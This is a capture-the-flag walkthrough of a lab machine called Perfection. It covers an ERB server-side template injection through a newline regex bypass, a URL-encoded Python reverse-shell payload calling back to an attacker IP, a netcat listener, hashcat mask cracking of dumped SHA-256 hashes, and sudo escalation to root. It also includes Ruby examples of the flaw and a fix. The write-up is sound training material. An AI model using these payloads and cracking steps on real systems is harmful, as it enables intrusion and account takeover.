Perfection - Walkthrough

Perfection is an easy Linux machine that features a web application with functionality to calculate student scores. This application is vulnerable to Server-Side Template Injection (SSTI) via regex filter bypass. A foothold can be gained by exploiting the SSTI vulnerability. Enumerating the user reveals they are part of the sudo group. Further enumeration uncovers a database with password hashes, and the user's mail reveals a possible password format. Using a mask attack on the hash, the user's password is obtained, which is leveraged to gain root access.

Reconnaissance

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.253 -oN perfection

The scan reveals:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx

Visiting the web service, we find a grade calculator application:

10.10.11.253/weighted-grade

Using Wappalyzer, we identify the technology stack as Ruby (WEBrick 1.7.0).

Exploitation

We test the application for Server-Side Template Injection (SSTI). After intercepting requests with BurpSuite, we craft payloads to bypass input filters.

[Screenshot: Burp Suite Repeater request]

Testing with ERB (Ruby) payloads from HackTricks, we achieve RCE. The newline (%0a) after a valid category value is what defeats the filter: in Ruby, the ^ and $ anchors match at line boundaries rather than at the start and end of the whole string, so a check written with them only validates the first line of the input, and everything after the newline reaches the ERB renderer untouched. We URL-encode a Python reverse shell and place it after the newline:

category%0a<%25%3d+`python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.58",5000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport+pty%3b+pty.spawn("bash")'`+%25>
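The bypass above in miniature, as an added example that is not code from the Perfection application: a hypothetical allow-list check written with ^ and $ (WEAK_RE), the same check with \A and \z (STRICT_RE), and a rendering function that concatenates the checked value into the ERB template source, next to a hardened version that keeps the template static and passes the value as escaped data. The regexes, function names and the constructed payload are assumptions chosen to mirror the decoded shape of the request above.

```ruby
require "erb"

# Added example, not the application's code. WEAK_RE models the anchor mistake
# that the newline bypass exploits: in Ruby, ^ and $ match at line boundaries,
# so the pattern only constrains the first line of the input.
WEAK_RE   = /^[a-zA-Z0-9 ]+$/     # line anchors: bypassable with "\n"
STRICT_RE = /\A[a-zA-Z0-9 ]+\z/   # string anchors: the whole input must match

def weak_check(s)
  s.match?(WEAK_RE)
end

def strict_check(s)
  s.match?(STRICT_RE)
end

# Vulnerable pattern: the user value is interpolated INTO the template source,
# so any <%= %> it carries is evaluated by ERB as Ruby.
def render_vulnerable(category)
  return "rejected" unless weak_check(category)
  ERB.new("<tr><td>#{category}</td></tr>").result(binding)
end

# Hardened pattern: static template, value passed as data through the binding
# and HTML-escaped, and the allow-list anchored to the whole string.
def render_hardened(category)
  return "rejected" unless strict_check(category)
  template = ERB.new("<tr><td><%= ERB::Util.html_escape(category) %></td></tr>")
  template.result(binding)
end

BENIGN  = "Mathematics"
# Constructed payload: a valid first line, a newline, then template code.
PAYLOAD = "category\n<%= 7 * 7 %>"

if __FILE__ == $0
  puts render_vulnerable(BENIGN)    # <tr><td>Mathematics</td></tr>
  puts render_vulnerable(PAYLOAD)   # second line of the cell is 49: code ran
  puts render_hardened(BENIGN)
  puts render_hardened(PAYLOAD)     # rejected
end
```

The arithmetic payload stands in for the backtick command in the real request; the same line-anchor behaviour lets both through. Note that a backtick in an ERB expression is Ruby's shell-execution operator, which is why the request above yields command execution rather than just template output.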

We set up a listener and execute the payload:

nc -lvnp 5000

[Screenshot: reverse shell caught by the listener]

We stabilize the shell and capture the user flag:

cat ~/user.txt

User flag: bfd33f2d5e72f0e6de3699e3bf0004bc

Privilege Escalation

Inside the user's home directory, we find a Migration folder containing a SQLite database:

susan@perfection:~/Migration$ file pupilpath_credentials.db
pupilpath_credentials.db: SQLite 3.x database

We dump the users table. The 64-hex-character values are unsalted SHA-256 digests (hashcat mode 1400):

sqlite3 pupilpath_credentials.db
sqlite> select * from users;
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

Reading /var/mail/susan reveals a password format:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

The format gives a fixed prefix for each account (for Susan, susan_nasus_) followed by the integer, so a hashcat mask attack is far cheaper than a wordlist. The nine ?d positions below cover only nine-digit numbers; the format allows anything from 1 to 10 digits, so a complete search would add --increment (-i) to step through the shorter masks as well. Susan's hash cracks with the nine-digit mask:

hashcat -a 3 -m 1400 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f "susan_nasus_?d?d?d?d?d?d?d?d?d" --show
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
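Deriving the per-account masks from the mail's password format and checking a recovered candidate against the database, as an added example rather than anything from the original walkthrough. The hashes are the ones listed from pupilpath_credentials.db above; the function names, the --increment command builder and the digit-length reasoning are this example's own.

```ruby
require "digest"

# Added example, not the walkthrough's code. Hashes copied from the users table
# above (SHA-256, hashcat mode 1400); the password format comes from /var/mail/susan.
USERS = {
  "Susan Miller" => "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f",
  "Tina Smith"   => "dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57",
}

# {firstname}_{firstname backwards}_ followed by one ?d per digit.
def mask_prefix(fullname)
  first = fullname.split.first.downcase
  "#{first}_#{first.reverse}_"
end

# The integer is 1..1,000,000,000, i.e. 1 to 10 digits, so a complete search
# needs a mask of every length in that range.
def masks_for(fullname, min_digits: 1, max_digits: 10)
  prefix = mask_prefix(fullname)
  (min_digits..max_digits).map { |n| prefix + "?d" * n }
end

# One hashcat invocation covering all lengths: the longest mask plus
# --increment, which hashcat walks from --increment-min up to the mask length.
def hashcat_command(fullname, min_digits: 1, max_digits: 10)
  ["hashcat", "-a", "3", "-m", "1400", "-i", "--increment-min", min_digits.to_s,
   USERS.fetch(fullname), mask_prefix(fullname) + "?d" * max_digits]
end

# Returns the candidate when its SHA-256 matches the stored digest, else nil.
def verify(fullname, candidate)
  Digest::SHA256.hexdigest(candidate) == USERS.fetch(fullname) ? candidate : nil
end

if __FILE__ == $0
  puts masks_for("Susan Miller", min_digits: 9, max_digits: 9).first
  puts hashcat_command("Susan Miller").join(" ")
  puts verify("Susan Miller", "susan_nasus_413759210").inspect
end
```

Run against a real hashcat, the nine-digit mask alone is 10^9 candidates, which SHA-256 on a GPU clears in seconds; the increment form costs only about 11% more and removes the guess about the number's length.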

We check sudo privileges:

sudo -l
User susan may run the following commands on perfection:
    (ALL : ALL) ALL

Susan can run any command as root. sudo prompts for her password, which is why cracking the hash was necessary; with it we escalate to root:

susan@perfection:/var/mail$ sudo bash

We capture the root flag:

cat ~/root.txt

Root flag: ea927a4fe65ba5eaf2323d5b7d22a061